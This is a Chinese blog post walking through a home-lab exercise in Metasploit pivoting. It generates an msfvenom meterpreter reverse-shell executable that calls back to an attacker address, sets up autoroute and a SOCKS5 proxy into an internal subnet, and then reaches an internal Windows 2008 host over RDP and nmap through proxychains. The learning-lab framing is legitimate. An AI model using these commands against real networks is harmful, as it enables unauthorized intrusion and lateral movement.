msf+proxychains组合搭建socks5隧道 | 内网穿透

实验环境

网络拓扑:
在这里插入图片描述

kali:

  • VMnet1(公网)192.168.52.134

win10:

  • VMnet1(公网)192.168.52.135
  • VMnet2(内网)192.168.72.133

win2008:

  • VMnet2(内网) 192.168.72.132

学习参考:https://www.cnblogs.com/cute-puli/p/15510271.html

1. 拿下域内主机win10权限

这里直接msfvenom生成一个反弹shell木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 LPORT=2333 --platform windows -f exe -o shell.exe

复制到win10,

kali进入msfconsole

user exploit/multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.134
set LPORT 2333
exploit -j

然后win10运行shell.exe就可以上线。

在这里插入图片描述

2. 添加路由

拿到meterpreter后,查看当前路由:

route

看到win10的路由(192.168.72.0):

在这里插入图片描述

我们把对应内网段的路由添加:

run autoroute -s 192.168.72.0

然后查看添加的路由:

run autoroute -p

在这里插入图片描述

3. 配置socks5内网代理

添加好内网路由后,background退出meterpreter;

搜索可以做代理的模块:

socks5

search socks_proxy

在这里插入图片描述

使用这个模块:(这个socks5代理要设置对应账号密码)

use auxiliary/server/socks_proxy
show options
set username admin
set password admin
run

在这里插入图片描述

4. proxychains | proxifier 测试连接

proxifier

对应填好:

ip: 192.168.52.134
port: 1080
username: admin
password: admin

在这里插入图片描述

可以看到是能连接的,访问不了外网是因为我网段都配的非NAT(方便配置)。

这里可以把测试baidu的换成192.168.72.132:445来测试:

在这里插入图片描述

这里尝试配置下proxifer使得能够rdp连接win2008这台域内主机。192.168.72.132

在这里插入图片描述

成功。


proxychains

注意!!!

proxychains只对tcp流量有效,所以不能用udp和icmp。

kali自带有proxychains

我们在第三步设置好socks5的代理后,需要配置一下

/etc/proxychains4.conf

按照:

socks5 ip port username password

配置。

在这里插入图片描述

然后在所有执行的命令前加上

proxychains即可。

这里以nmap为示例:

注意:不能用ping扫描!!!

一定要用nmap -sT -Pn

proxychains nmap -sT -Pn 192.168.72.132

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值